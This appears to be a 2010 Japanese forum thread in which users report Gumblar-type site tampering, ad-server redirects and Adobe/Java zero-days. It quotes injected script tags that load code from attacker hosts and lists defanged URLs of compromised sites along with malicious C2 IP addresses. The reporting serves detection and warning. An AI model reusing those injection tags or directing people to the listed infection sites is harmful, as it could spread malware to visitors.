2010/09/28(火) 02:01:35で、アドビは休みに入るから対応遅れるけど よろしくねー的な対応だった気が・・・
0332名無しさん@お腹いっぱい。
2010/09/28(火) 05:06:07あれは酷かった・・・
さんざん機能拡張した挙句
脆弱性だらけのものを作っておきながら
感染拡大状態から対応に約一ヶ月かかった。
http://www.so-net.ne.jp/security/news/library/2118.html
0333名無しさん@お腹いっぱい。
2010/09/28(火) 06:50:08来月4日「の週」の予定
0334名無しさん@お腹いっぱい。
2010/09/28(火) 10:40:450335名無しさん@お腹いっぱい。
2010/09/28(火) 13:02:040336名無しさん@お腹いっぱい。
2010/09/28(火) 13:25:210337名無しさん@お腹いっぱい。
2010/09/28(火) 14:17:18tukaoh●com/index●html
0338名無しさん@お腹いっぱい。
2010/09/28(火) 22:21:55ttps://www-950.ibm.com/blogs/tokyo-soc/entry/adobe_0day_20100928?lang=ja
0339名無しさん@お腹いっぱい。
2010/09/29(水) 03:13:45XPやFirefox使い続けるんだろ?
Vista以降・IEで保護モードオンorChrome・一般ユーザーでログイン
の3つを組み合わせたら相当安全性高まるのにね
0340名無しさん@お腹いっぱい。
2010/09/29(水) 03:16:00たまにそれにあうな
サードパーティーのFlashクッキーを受け入れない設定にしてニコニコ動画見た場合とかそれにあう
その他にも条件不明だけどたまに数十秒間フリーズするサイトがある
0341名無しさん@お腹いっぱい。
2010/09/29(水) 03:25:32動画サイトを見ていてそうなったことがあったかも。
その現象について書かれたサイトってあったりする?
以前のverのFlashだと脆弱性があるって聞くし、
アップデートしといた方が良いんだろうけど、
ブラウザごとのフリーズくらいなら我慢するしかないのか・・・
0342名無しさん@お腹いっぱい。
2010/09/29(水) 10:01:490343名無しさん@お腹いっぱい。
2010/09/29(水) 17:41:31人柱版なんで別の未知の穴あいてるかもしれないけど
0344名無しさん@お腹いっぱい。
2010/09/29(水) 19:03:45基本的な対策を怠ってる愚か者は何を使っても喰らうから、OSとかブラウザはあまり関係無い。
そして真の愚か者は、HIPSが止めたものを確認もしないで「はい(実行)」を押して感染するw
0345名無しさん@お腹いっぱい。
2010/09/29(水) 19:40:580346sage
2010/09/30(木) 01:40:23ASP.NET の脆弱性により、情報漏えいが起こる (2418042)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms10-070.mspx
NET Frameworkオワタ
0347名無しさん@お腹いっぱい。
2010/09/30(木) 03:28:080348名無しさん@お腹いっぱい。
2010/10/01(金) 23:48:50なんに使うん?
広告サーバー改竄でSecurityToolがアップロード
されてた所はまだ稼動しておるが
0349名無しさん@お腹いっぱい。
2010/10/02(土) 08:07:290350名無しさん@お腹いっぱい。
2010/10/04(月) 02:00:31>弊社にて確認したところ9月24日23:30頃には悪意あるサイトへの転送は停止しておりました。
25日1時ごろまでドライブバイ・ダウンロード状態だったはず
GIGAZINEでの確認も9月24日(金)23時59分22秒だし↓
http://gigazine.net/index.php?/news/comments/20100927_security_tool/
詳細を告知すりゃ名誉挽回できるのに残念
0351名無しさん@お腹いっぱい。
2010/10/04(月) 02:02:58どうでも良いだろ
0352名無しさん@お腹いっぱい。
2010/10/04(月) 02:10:440353名無しさん@お腹いっぱい。
2010/10/04(月) 02:34:27改竄されたのは残念だけど、失敗の経験を共有したい
繕うとすると可笑しなことに↓なるし
ttp://mimizun.com/log/2ch/sec/1274675964/118-
0354名無しさん@お腹いっぱい。
2010/10/04(月) 02:44:41意味が分からないな
0355/名無しさん[1-30] ◆.htmlint.U
2010/10/04(月) 07:06:03>>303の頃にはメルしてた。
広告枠のタグのアドレス→転送サイト自体が蹴りまくっていたようなので環境によっては>>350になるかも。(転送先アドレスも含めてダンさん蹴られてた。)
aguseで転送サイトから転送先アドレスの最終確認は 2010/09/25 01:38 頃。
0356名無しさん@お腹いっぱい。
2010/10/05(火) 18:42:56www●cyg●jp/
>サイバーギグスのWEBサイト制作は(中略)1ページ1万円という低価…
↓
www●movie-aa●com/
<title>サイバーギグス|PV制作|専門用語集|-あ行-|
<script src=http://pop●dj/en/sitemap●php ></script>映画とは?</title>
他人の心配をする前に、自社のサイトが改竄されてるのを何とかしてくださいw
【Google先生の診断結果】
www.google.com/safebrowsing/diagnostic?site=www●movie-aa●com/&hl=ja
>疑わしいサイトとして認識されています。>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
>Google が最後にこのサイトを巡回したのは2010-09-30で、このサイトで不審なコンテンツが最後に検出されたのは2010-09-30です。
ぐっじょぶwwwww
0357/名無しさん[1-30] ◆.htmlint.U
2010/10/05(火) 20:02:24otu
JSUNPACK
f6e5de3faf0333e2e04d04c1ad02c0562cee14c7
6bbf617a256b2c06b91fcf74daad67035fa0a410
VIRUSTOTAL.
b6cf294f8fc9ecfe0a57ec6ee74f751ec3479aeba7b85265839bec7c36a4f6ba
daeea74be1aced7dfee6065d8eaa0b7b168faf1368e5bac8d327cc522153bab7
タグはDanさんとこ蹴っている。。。
0358/名無しさん[1-30] ◆.htmlint.U
2010/10/05(火) 20:51:210359/名無しさん[1-30] ◆.htmlint.U
2010/10/05(火) 23:55:36つづき
Avira対応予定
HTML/ScrInject.G
JS/Dldr.Agent.abb
あきたねる
0360名無しさん@お腹いっぱい。
2010/10/06(水) 18:29:30FTPパス抜かれまくって改竄されるんだろうな
0361名無しさん@お腹いっぱい。
2010/10/06(水) 20:37:110362名無しさん@お腹いっぱい。
2010/10/07(木) 23:33:42取扱注意
・google-statsXX系
www●snowfan-mimo●com/area/area-service●asp?sID=467
sID=XXXが全滅の予感
【Google先生の(ry
www.google.com/safebrowsing/diagnostic?site=www●snowfan-mimo●com/&hl=ja
>146 ページのうち 74 ページで、ユーザーの同意なしに不正なソフ…
0363/名無しさん[1-30] ◆.htmlint.U
2010/10/08(金) 00:15:32こちらの環境では500返ってきます。
ヤホのキャッシュで確認しましたが誘導先のstats50はないようです。。。
スクリプトを抜き出してVTに投げてみました。
833e2f264ae0ec69445fdc6d070312b564654cd72480b8c1465478401af77658
とか、やってるうちに>>362繋がった。
55ってのもあるんか。。。
ワイルドカードなんかな?
0364/名無しさん[1-30] ◆.htmlint.U
2010/10/08(金) 01:07:32あらためて乙ですた。
めるぽかんりょっす。
0365名無しさん@お腹いっぱい。
2010/10/08(金) 16:19:43ツール・ド・安倍峠 - MCプロダクトのページ
このサイトはコンピュータに損害を与える可能性があります。
2010年8月20日 ... ツール・ド・安倍峠 大会事務局 佐藤 治史(サトウ ハルフミ) ※入金の確認が取れた方には、事務局より参加受理書をお送りいたします。 ※ネット銀行よりお振込される方は、 振込先を全て入力して下さい。 ...
www●mc-pro●co●jp/abetouge/abetouge.html
0366/名無しさん[1-30] ◆.htmlint.U
2010/10/08(金) 19:04:16こんなことがあったようです。(>>353を参考にみてくださいな)
http://yuzuru.2ch.net/test/read.cgi/bicycle/1274359715/820-871 (820、830、836、871)
深くは見ていないので他の方のご意見・報告もお待ちくださいな。
>>362
404になったっぽい。
Avira対応予定
HTML/SrcInject.C
HTML/SrcInject.L
HTML/SrcInject.M
HTML/SrcInject.N
HTML/SrcInject.O
0367名無しさん@お腹いっぱい。
2010/10/08(金) 19:36:10静岡市・身延町交流イベント実行委員会 静岡市側 に凸。
市役所に繋がりました。市役所から業者に問い合わせるそうです。
>>366
●がないからみれにゃい。。
0368/名無しさん[1-30] ◆.htmlint.U
2010/10/08(金) 19:58:56乙です乙です。
> ●
>>366の http://yuzuru.2ch.net/test/read.cgi/bicycle/1274359715/820-871 を>>353のようにすると過去ログがある場合もあります。
mimizun.com/log/2ch/bicycle/1274359715/820-871
(直リンするとみみずんさんの負担が大きいので>>366にしました。)
みみずんさんとこに無い場合もありますん。
2ch DAT落ちスレ ミラー変換機
ttp://mirrorhenkan.g.ribbon.to/
それでも無いことも。。。
●があればパーペキなんですけど。。。orz.....
0369名無しさん@お腹いっぱい。
2010/10/08(金) 20:14:52みっけ
http://2chnull.info/r/bicycle/1274359715/801-900
0370名無しさん@お腹いっぱい。
2010/10/08(金) 20:15:54そのページとトップページを見たけど不正コードを確認できない
Googleも最後の検知日が9/20でもう時間が経っちゃてる
ハッキングされてたのは間違いなんだろうけど
Google警告は管理者が対処完了報告しないと一定期間は消えない
0371名無しさん@お腹いっぱい。
2010/10/09(土) 17:09:46開くとメディアプレイヤーアドオンを要求。
で、そのコードが</html>の後にあるのがちょっと怪しい。
blogs●yahoo●co●jp/tmoebooks/2463230●html
どうなんだろ、ここ
0372名無しさん@お腹いっぱい。
2010/10/09(土) 17:29:450373名無しさん@お腹いっぱい。
2010/10/09(土) 17:52:15報告してくれてるだけマシだろ
少なくともおまえのレスよりぜんぜんマシ
0374名無しさん@お腹いっぱい。
2010/10/09(土) 17:59:440375名無しさん@お腹いっぱい。
2010/10/09(土) 18:38:170376名無しさん@お腹いっぱい。
2010/10/09(土) 18:40:070377名無しさん@お腹いっぱい。
2010/10/09(土) 18:47:33ここはどっちかっていうと明らかなやつについて情報交換するスレ
0378名無しさん@お腹いっぱい。
2010/10/09(土) 20:13:310379名無しさん@お腹いっぱい。
2010/10/10(日) 00:31:53Yahoo!ブログは初めてか? 力抜けよ、どこも同じだから
yimg.jpはYahoo!のファイル置き場な
0380名無しさん@お腹いっぱい。
2010/10/10(日) 11:26:520381名無しさん@お腹いっぱい。
2010/10/10(日) 21:34:44未対応&再改竄のため再掲載
サイバーギグス
www●movie-aa●com/
・JSUNPACK
3c77eaea56260e02a480ebf8e2bff22b39636c3b
絶賛放置&崩壊中
iiji●biz/
文字化けして読めませんw
0382/名無しさん[1-30] ◆.htmlint.U
2010/10/11(月) 00:35:26おつですん。
上 二回目 無視かのぉ。。。
下 WHOISからメルってみました。
0383名無しさん@お腹いっぱい。
2010/10/11(月) 11:13:40body-shaver●seesaa●net/
collagen-07●seesaa●net/
exercise-repo13●seesaa●net/
はaguse.jpでチェックすると
<script type="text/javascript" src="http://pantscow●ru:8080/Hardware●js"></script>
へのリンクがあると出てきますが、Sauceを見てもどこかがわかりません。
なんか、この間みたいにAdserverから出されているような気がするのですが、どなたかわかりませんか?
0384名無しさん@お腹いっぱい。
2010/10/11(月) 11:49:31sales-agency●jp/flv/swfobject●js
の末尾にありました
0385名無しさん@お腹いっぱい。
2010/10/11(月) 17:07:55ネットショップ代行会社が感染して
アフィ広告FLASH表示用のjsスクリプトに挿入されてるから
他のブログにも挿入されてる
Last-Modified: Sun, 18 Jul 2010 12:46:15 GMT
改竄されたのが6月と古く 今はpantscow●ruのIPがないので無害だと思うけど
当時はヘルプとサポートのゼロデイ攻撃もあったから効果があったかも
0386名無しさん@お腹いっぱい。
2010/10/11(月) 22:32:11http://hibari.2ch.net/test/read.cgi/sec/1286803659/
0387名無しさん@お腹いっぱい。
2010/10/12(火) 01:15:55ttp://megalodon.jp/2010-1011-1611-42/www.dan.co.uk/viewsource/index.php?url=http://sales-agency.jp/flv/swfobject%2Ejs
ttp://jsunpack.jeek.org/dec/go?report=f1ea966d8de496b7f53a06c0f08549ab5886f4b5
ttp://megalodon.jp/2010-1012-0104-37/gw.aguse.jp/captured_images/b4a9dcc6bea6a68e3b979ea0145e67dfed4ef1b6-0.png
0388名無しさん@お腹いっぱい。
2010/10/12(火) 09:55:020389名無しさん@お腹いっぱい。
2010/10/12(火) 18:28:56諸々の対策が効果を出してきたか、改ざんが分かりにくくなったか?
0390名無しさん@お腹いっぱい。
2010/10/12(火) 22:34:50[止まらぬサイト改ざん(1) ISPがガンブラー対策〜パスワードリセット敢行も]
http://www.so-net.ne.jp/security/news/library/2248.html
[ 止まらぬサイト改ざん(3):全ユーザー「FTPパスワード強制変更」の効果]
http://www.so-net.ne.jp/security/news/library/2278.html
sakuraは1月と比べて241→ 770と増えてるみたいだけどね
ttp://mimizun.com/log/2ch/sec/1263822552/855
0391名無しさん@お腹いっぱい。
2010/10/12(火) 23:57:38> ttp://www.aguse.net/
糞仕様になったな
0392名無しさん@お腹いっぱい。
2010/10/13(水) 04:04:490393名無しさん@お腹いっぱい。
2010/10/16(土) 07:21:22もういいのか?
0394名無しさん@お腹いっぱい。
2010/10/16(土) 09:44:27MicroAdみたいのはいつでも起こりうるから「もういい」なんてなしす
gumblar → 活動継続中、相変わらず日IPは弾かれる
8080 → 先月から活動が鈍い感じ? 今週は小康状態
0395名無しさん@お腹いっぱい。
2010/10/16(土) 23:07:46感染するような奴はいつもだいたい同じだから
新しい感染者を出すには別の国を短期集中的にやるのか?
0396名無しさん@お腹いっぱい。
2010/10/20(水) 01:42:55p://www■famicom-plaza■com/blog/
10月18日 AM5:00頃〜AM11:00 にサイトに訪れた人にガンブラーの感染の疑い有りだそうです。
現在は上のページは復旧しているようです。
0397名無しさん@お腹いっぱい。
2010/10/20(水) 03:38:37http://xyz111◎k2◎xrea◎com/comic/
http://click-no1◎jp/kp-unescape◎html
http://amyou◎net/pet/?feed=rss2
http://www◎marucen◎co◎jp/main◎html
http://www◎citydusk◎com/
失敗例含むかも
0398名無しさん@お腹いっぱい。
2010/10/20(水) 11:18:010399名無しさん@お腹いっぱい。
2010/10/20(水) 21:41:25http://blog.f-secure.jp/archives/50455216.html
.soファイル↓とやらを利用する亜種があるそうな
[動的共有オブジェクト (DSO) サポート - Apache HTTP サーバ]
http://httpd.apache.org/docs/2.0/dso.html
0400名無しさん@お腹いっぱい。
2010/10/21(木) 23:32:41click-no1 はY知恵袋の質問文を引っ張ってきたものなので改ざんされてない
(ワードサラダなごみサイトだが)
0401名無しさん@お腹いっぱい。
2010/10/22(金) 00:00:38http://www.itmedia.co.jp/news/articles/1010/20/news060.html
0402名無しさん@お腹いっぱい。
2010/10/22(金) 10:35:560403名無しさん@お腹いっぱい。
2010/10/23(土) 00:51:29隠蔽とか、完璧にオワタwwww
0404名無しさん@お腹いっぱい。
2010/10/23(土) 18:29:19それを隠蔽するも改ざんされてた事がバレる
信頼度0%になってしまった
0405名無しさん@お腹いっぱい。
2010/10/23(土) 19:10:320406名無しさん@お腹いっぱい。
2010/10/23(土) 23:04:450407名無しさん@お腹いっぱい。
2010/10/23(土) 23:59:500408名無しさん@お腹いっぱい。
2010/10/25(月) 16:33:24ttp://blog.trendmicro.co.jp/archives/3723
ttp://www.rbbtoday.com/article/2010/10/25/71502.html
ttp://journal.mycom.co.jp/news/2010/10/25/041/
0409名無しさん@お腹いっぱい。
2010/10/25(月) 17:14:310410名無しさん@お腹いっぱい。
2010/10/25(月) 17:35:400411名無しさん@お腹いっぱい。
2010/10/25(月) 17:43:22「最新バージョンのセキュリティソフトを導入し、最新の状態に保つ」という2点を
改めて徹底するよう呼びかけている。
ttp://internet.watch.impress.co.jp/docs/news/20101025_402502.html
Javaの脆弱性を悪用する不正プログラム「JAVA_AGENT.P」
0412名無しさん@お腹いっぱい。
2010/10/25(月) 18:28:010413名無しさん@お腹いっぱい。
2010/10/25(月) 19:30:28これってマイクロアドのヤツか?
GIGAZINEでは'Security Tool'の他に
メディアプレーヤ、pdf、JARの脆弱性も利用されたみたいだし
「mstmp」系ウィルス補完計画
ttp://d.hatena.ne.jp/connect24h/comment?date=20101022
0414名無しさん@お腹いっぱい。
2010/10/26(火) 02:03:36全然収束しなかったね。ガンブラーに関しては警察も動く的な記事を読んだ気もするけど・・
0415名無しさん@お腹いっぱい。
2010/10/26(火) 09:24:460416名無しさん@お腹いっぱい。
2010/10/26(火) 09:51:42ttp://www.youtube.com/watch?v=wpxcCKYvDsc
2010年上半期までは6:4とGumblar優勢だったはずが、
下半期に入りConfickerが逆転し、王者交代が行われた模様
だそうで(企業の話で一般家庭の話ではないみたい)
0417名無しさん@お腹いっぱい。
2010/10/26(火) 12:53:160418名無しさん@お腹いっぱい。
2010/10/26(火) 13:19:26実は産業にダメージを与えるための兵器なのかもしれんな
0419名無しさん@お腹いっぱい。
2010/10/26(火) 15:29:36ほんと、よくできたウィルスつくりやがって
0420名無しさん@お腹いっぱい。
2010/10/26(火) 22:31:590421名無しさん@お腹いっぱい。
2010/10/26(火) 23:03:56基本が大事なのです
各ソフトウェアのバージョンはちゃんと確認しなおしてね!
0422名無しさん@お腹いっぱい。
2010/10/26(火) 23:15:27国内100社以上で感染被害を確認。?mstmp? ?lib.dll? のファイル名で拡散する不正プログラム
ttp://blog.trendmicro.co.jp/archives/3723
ttp://www.rbbtoday.com/article/2010/10/25/71502.html
ttp://journal.mycom.co.jp/news/2010/10/25/041/
上記のウィルス
一応、JAVAは、最新版、導入しました
0423名無しさん@お腹いっぱい。
2010/10/27(水) 01:21:48最新版を含む対象の脆弱性がないバージョンの場合は何もせずスルーするらしい。
0424名無しさん@お腹いっぱい。
2010/10/27(水) 13:18:16古いJREが残る場合もあるようだから消しとくといいのかも。
0425名無しさん@お腹いっぱい。
2010/10/27(水) 19:21:58> これってマイクロアドのヤツか?
マイクロアドじゃなくて、どこかのアクセス解析サービスらしい
アクセス解析サービスを使用した Web サイト経由での攻撃に関する注意喚起
ttp://www.jpcert.or.jp/at/2010/at100028.txt
0426名無しさん@お腹いっぱい。
2010/10/27(水) 19:29:35本来は、そこをきちんと公開するべきじゃないのかな?
0427名無しさん@お腹いっぱい。
2010/10/27(水) 23:35:39ttp://kikuz0u.x0.com/blog/?p=644
0428名無しさん@お腹いっぱい。
2010/10/28(木) 00:15:55既に分かってるんだけど、JPCERTが言わないからまだ野放しにされている。
指摘を受けたところは調査中らしいけど。
↓
http://d.hatena.ne.jp/connect24h/comment?date=20101022
0429名無しさん@お腹いっぱい。
2010/10/28(木) 08:25:28アクセス解析というとxreaは昔やられてたな
0430sage
2010/10/28(木) 14:28:350431名無しさん@お腹いっぱい。
2010/10/28(木) 16:30:02http://gdata.co.jp/press/archives/2010/10/36.htm
↓スクリプトでリダイレクトされるファイルが昨日も更新されてる
netdekase5●sakura●ne●jp
shimadaaqua●sakura●ne●jp
umeshin●sakura●ne●jp
0432名無しさん@お腹いっぱい。
2010/10/28(木) 16:32:45ttp://itpro.nikkeibp.co.jp/article/COLUMN/20101027/353496/
413,428に引用されているblogの人が、経緯について詳しく説明している
0433名無しさん@お腹いっぱい。
2010/10/28(木) 16:45:21G DATAが言ってるのはGumblar 8080系の事で、Gumblar.xはまだ生きてるらしい
0434名無しさん@お腹いっぱい。
2010/10/28(木) 17:13:46海外の串でも使わんと影響ないだろ
0435名無しさん@お腹いっぱい。
2010/10/28(木) 21:54:58www●mypondstore●com/ThumbnailFrame●htm
↓
<script>var XepaZerc='・・・・・
今騒いでるのはコイツだろ?
0436名無しさん@お腹いっぱい。
2010/10/28(木) 22:06:090437名無しさん@お腹いっぱい。
2010/10/29(金) 07:33:288080の方は更新止まってる
Gumblar.xが挿入してる「〜php」の部分が絶賛更新中
0438名無しさん@お腹いっぱい。
2010/10/29(金) 08:44:32Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
Release date: October 28, 2010
Flash Playerはby November 9, 2010
Adobe Reader and Acrobatはduring the week of November 15, 2010
ttp://www.adobe.com/support/security/advisories/apsa10-05.html
0439名無しさん@お腹いっぱい。
2010/10/29(金) 10:54:53アップデートめんどい
0440名無しさん@お腹いっぱい。
2010/10/29(金) 11:29:58イミフ
0441名無しさん@お腹いっぱい。
2010/10/29(金) 11:34:570442名無しさん@お腹いっぱい。
2010/10/29(金) 11:51:010443名無しさん@お腹いっぱい。
2010/10/29(金) 12:01:05http://hato.2ch.net/test/read.cgi/news/1288319125/
0444名無しさん@お腹いっぱい。
2010/10/29(金) 12:18:22セフィロスw
0445名無しさん@お腹いっぱい。
2010/10/29(金) 15:12:02catv?の人は去年から ここの感染URLを張り続けてますよね
そういう仕事なの?セキュリティ関連会社とか
0446名無しさん@お腹いっぱい。
2010/10/29(金) 15:22:57Shockwave Player 11.5.9.615
ttp://www.adobe.com/support/security/bulletins/apsb10-25.html
0447名無しさん@お腹いっぱい。
2010/10/29(金) 21:41:03http://hissi.org/read.php/news/20100923/RVFMTXcvWlow.html
スレ立て依頼してウイルスリンク張るのが
最近のスタイルなのかしら
0448名無しさん@お腹いっぱい。
2010/10/30(土) 00:26:53■【ゼロデイ攻撃】Adobe Reader/Flash Playerの未修整の脆弱性狙うトロイの木馬
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2391
>Adobe Reader/Acrobat 9.4およびそれ以前のバージョン
>Flash Player 10.1.85.3およびそれ以前のバージョン
■APSA10-05: Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat(セキュリティホールmemo)
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2010/10.html#20101029_Flash
今年何回目のゼロデイだよw
0449名無しさん@お腹いっぱい。
2010/10/30(土) 00:46:28なのにFlashを排除するAppleはおかしい
0450名無しさん@お腹いっぱい。
2010/10/30(土) 01:46:52やる気無いならさっさと辞めちまえ!
0451名無しさん@お腹いっぱい。
2010/10/30(土) 04:23:500452名無しさん@お腹いっぱい。
2010/10/30(土) 10:46:20激しくワロタw
0453名無しさん@お腹いっぱい。
2010/10/30(土) 10:49:01何の利害関係も無いスーパーハカーが、狙いやすいからやってるとかの問題じゃないような気がするんだけど…
0454名無しさん@お腹いっぱい。
2010/10/30(土) 11:07:430455名無しさん@お腹いっぱい。
2010/10/30(土) 13:28:36ゼロデイ放置のほうが安全なような気がしてきたw
0456名無しさん@お腹いっぱい。
2010/10/30(土) 16:56:490457名無しさん@お腹いっぱい。
2010/10/30(土) 17:02:33http://internet.watch.impress.co.jp/docs/news/20101029_403477.html
>Flash Playerでは、Windows/Macintosh/Linux/Solaris版のバージョン10.1.85.3以前と、Android版の10.1.95.2以前が影響を受ける。
0458名無しさん@お腹いっぱい。
2010/10/31(日) 08:45:160459名無しさん@お腹いっぱい。
2010/10/31(日) 08:47:250460名無しさん@お腹いっぱい。
2010/10/31(日) 09:35:260461名無しさん@お腹いっぱい。
2010/10/31(日) 11:01:120462名無しさん@お腹いっぱい。
2010/10/31(日) 16:42:46flashを遮断すれば大丈夫なのでしょうか?
0463名無しさん@お腹いっぱい。
2010/10/31(日) 18:44:59意味茄子
0464名無しさん@お腹いっぱい。
2010/10/31(日) 22:03:150465名無しさん@お腹いっぱい。
2010/11/01(月) 01:46:18Flash Playerは代替品が無いというのが痛いなw
0466名無しさん@お腹いっぱい。
2010/11/01(月) 10:46:53まあそうなると98以前では動画とか見れなくなるが…
0467名無しさん@お腹いっぱい。
2010/11/01(月) 13:11:30株式会社ラックは10月29日、国内の多数のサイトで発生したガンブラー型攻撃による
ウイルス感染の実態について、特徴や手口の傾向が判明したとして、注意喚起を公表した。
ウイルスが接続を試みるIPアドレスは、以下のアドレス。
[64.27.25.223]、[64.27.25.224]、[88.80.7.152]、[85.17.209.3]、
[95.211.111.229]、[95.211.108.93]、[178.63.62.19]
http://internet.watch.impress.co.jp/docs/news/20101101_403962.html
0468名無しさん@お腹いっぱい。
2010/11/01(月) 15:46:41>今回確認された攻撃ではJava Runtime Environment(JRE)の脆弱性(CVE-2008-5353)を悪用することが確認された。
>ラックでは、多くの組織で社内システムやパッケージソフトに付属するそれぞれのJREを使用しているケースが見受けられ、
>そのためにJREのセキュリティ対策を適切に取れず、被害が相当数の企業に拡散していることが推測されるとしている。
CVE-2008ってことは2年前かと思ったら[CVE-2010-0094]もあるらしい
[アフィリエイトによる金銭取得が目的か!? −“mstmp””lib.dll”攻撃続報 | トレンドマイクロ セキュリティ ブログ]
http://blog.trendmicro.co.jp/archives/3728
0469名無しさん@お腹いっぱい。
2010/11/01(月) 17:17:15半年も放置して感染したボンクラが救いようもないことにかわりはない
0470名無しさん@お腹いっぱい。
2010/11/01(月) 17:20:47http://hato.2ch.net/test/read.cgi/news/1288588760/
0471名無しさん@お腹いっぱい。
2010/11/01(月) 22:18:10>>447
ttp://hissi.org/read.php/news/20101101/SlRWS2IyRlcw.html
0472名無しさん@お腹いっぱい。
2010/11/02(火) 15:25:370473名無しさん@お腹いっぱい。
2010/11/02(火) 22:52:400474名無しさん@お腹いっぱい。
2010/11/02(火) 22:53:280475名無しさん@お腹いっぱい。
2010/11/03(水) 00:54:11https://www-950.ibm.com/blogs/tokyo-soc/entry/gumblar8080_20101102?lang=ja
「8080は滅びぬ、何度でも蘇るさ」
0476名無しさん@お腹いっぱい。
2010/11/03(水) 03:36:46ブラウザとavastが反応
これはガチ?
0477名無しさん@お腹いっぱい。
2010/11/03(水) 04:00:29>>475
■オランダ当局がBredolabボットネットを閉鎖〜関連不明も8080系攻撃は停止中
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2393
突っ込まれてるコード(URL)は現時点では無害。
・・だが、この先どうなるかは誰も知らん。
0478名無しさん@お腹いっぱい。
2010/11/03(水) 04:02:230479名無しさん@お腹いっぱい。
2010/11/03(水) 04:11:15把握
0480名無しさん@お腹いっぱい。
2010/11/03(水) 10:54:41これのこと
genoウイルスとかなってるがぜんぜん関係ない
tp://blogs.yahoo.co.jp/noooo_spam/60457929.html
0481名無しさん@お腹いっぱい。
2010/11/03(水) 17:37:18ありがとう
0482名無しさん@お腹いっぱい。
2010/11/03(水) 21:29:08>ぜんぜん関係ない
その記事には「ガンブラー型攻撃」って書いてあるし
Gumblarで盗まれたアカウントが使われたかもよ
多サイトにスクリプトを置く、価値の高いアカウントだから変化をつけたとか
マイクロアドのも似てるし
http://gw.aguse.jp.nyud.net/?aguse_&aguse_url=http://hoodrugs.com/
>悪者は盗んだアカウント情報を“温存”している?
0484名無しさん@お腹いっぱい。
2010/11/04(木) 07:23:33ttp://kitamakura.seesaa.net/article/168211287.html
0485名無しさん@お腹いっぱい。
2010/11/04(木) 08:25:53ほんとに仮想PCでネットすること考えないとダメかこりゃ
0486名無しさん@お腹いっぱい。
2010/11/04(木) 08:33:26魚拓踏みまくってるしw
0487名無しさん@お腹いっぱい。
2010/11/04(木) 11:33:54ウィルスに感染しているサイトの魚拓を閲覧したとかじゃないの?
0488名無しさん@お腹いっぱい。
2010/11/04(木) 12:31:29そのまま保存されるからな
0489名無しさん@お腹いっぱい。
2010/11/04(木) 13:30:32表示できても時間を置くと見れなくなる
10月31日以降の魚拓が見れない異常事態
http://megalodon.jp/pc/history/20101031
http://megalodon.jp/pc/history/20101101
"Nine-Ball"ってGumblar型の攻撃だと思うけど
魚拓に対しての攻撃みたいだ
0490名無しさん@お腹いっぱい。
2010/11/04(木) 13:54:330491名無しさん@お腹いっぱい。
2010/11/04(木) 14:06:36http://hato.2ch.net/test/read.cgi/news/1288846500/
0492名無しさん@お腹いっぱい。
2010/11/04(木) 20:43:0891 名無しさん@お腹いっぱい。 [sage] 2010/11/04(木) 20:21:19 ID: Be:
株式会社アフィリティー ≫ Blog Archive ≫ ウェブ魚拓がウイルスに感染したという情報が流れている件につきまして
http://www.affility.co.jp/archives/229
0493名無しさん@お腹いっぱい。
2010/11/04(木) 20:44:11リンク先より一部抜粋
>技術担当です。
>利用者の皆様にはご心配をおかけして申し訳ありません。
>ウイルス感染およびウェブサイトの改竄、侵入等について調査しましたが、確認できておりません。
>ウェブサーバの設定は書き換えられておらず、ウェブ公開フォルダの中にも不審なファイルは見つかりませんでした。
0494名無しさん@お腹いっぱい。
2010/11/04(木) 21:56:34「ソコ」は.htaccessやられてるみたいだぬ。
>ちょめちょめ●ru/mymap/
referer:ちょめちょめ●ru/mymap/
→404 Not Found
referer:www.帝國.com/
→iframe イパーイ
危険なので以下略とす
0495494
2010/11/04(木) 22:01:46UA見てるから、IE6(笑)とかで凸すr(ry
0496/名無しさん[1-30] ◆.htmlint.U
2010/11/04(木) 22:07:06(・3・) リファラ当てるの苦手YO
.htaccessかお。。。
0497/名無しさん[1-30] ◆.htmlint.U
2010/11/04(木) 22:15:50【無】の中の人とは違いますお。
0499名無しさん@お腹いっぱい。
2010/11/04(木) 23:44:01http://www.affility.co.jp/archives/233
一部抜粋
>2008年の1月にウイルスが含まれるウェブサイトの魚拓をとった人がいたようです。
〜中略
>最近になって誰かがウイルスソフトを稼働させながら、この魚拓を閲覧して、
>サイト全体が感染している可能性があるとみなされ、その情報が共有されたのだと思われます。
これから感染したサイトの魚拓はとらない方が良さそうだね
0500名無しさん@お腹いっぱい。
2010/11/04(木) 23:54:560501名無しさん@お腹いっぱい。
2010/11/05(金) 08:53:29JavaやFlashやPDF使うなら、Vista以降で保護モード使え
一般社員には管理者権限でログインさせんな
ってことでだいたい防御できるのにね
0502名無しさん@お腹いっぱい。
2010/11/05(金) 11:33:010503名無しさん@お腹いっぱい。
2010/11/05(金) 12:58:27そうなったら被害が怖いな
ほんとうにFlashはこの先無くなったほうがいいかもね
ジョブズの気持ちも分からんでもない
0504名無しさん@お腹いっぱい。
2010/11/05(金) 13:54:02AppleもAdobeに負けず劣らず0-day状態のままほったらかす体質じゃないか。
0505名無しさん@お腹いっぱい。
2010/11/05(金) 14:17:17トン
0506名無しさん@お腹いっぱい。
2010/11/05(金) 14:54:220507名無しさん@お腹いっぱい。
2010/11/05(金) 18:37:530508名無しさん@お腹いっぱい。
2010/11/05(金) 20:40:24同じバージョンがIE他でも出るのかどうか
0509名無しさん@お腹いっぱい。
2010/11/05(金) 21:21:06Googleが好き勝手に改造してるんだろうし、
AppleにボコられてヘコんでるAdobeに
今の強大なGoogle帝国に意見する度胸は無い
0510名無しさん@お腹いっぱい。
2010/11/06(土) 00:56:38■AdobeがFlashの深刻な脆弱性を解決、Readerに新たな問題発覚
ttp://www.itmedia.co.jp/enterprise/articles/1011/05/news045.html
>これとは別にAdobeは同日、Readerの新たな問題がセキュリティメーリングリストに公表されたことを明らかにした。
このザマだからなw
0511名無しさん@お腹いっぱい。
2010/11/06(土) 12:44:380512名無しさん@お腹いっぱい。
2010/11/06(土) 17:51:240513名無しさん@お腹いっぱい。
2010/11/06(土) 17:51:580514名無しさん@お腹いっぱい。
2010/11/06(土) 22:55:43inininininininin●in
comcomcomcomcomcom●com
0515名無しさん@お腹いっぱい。
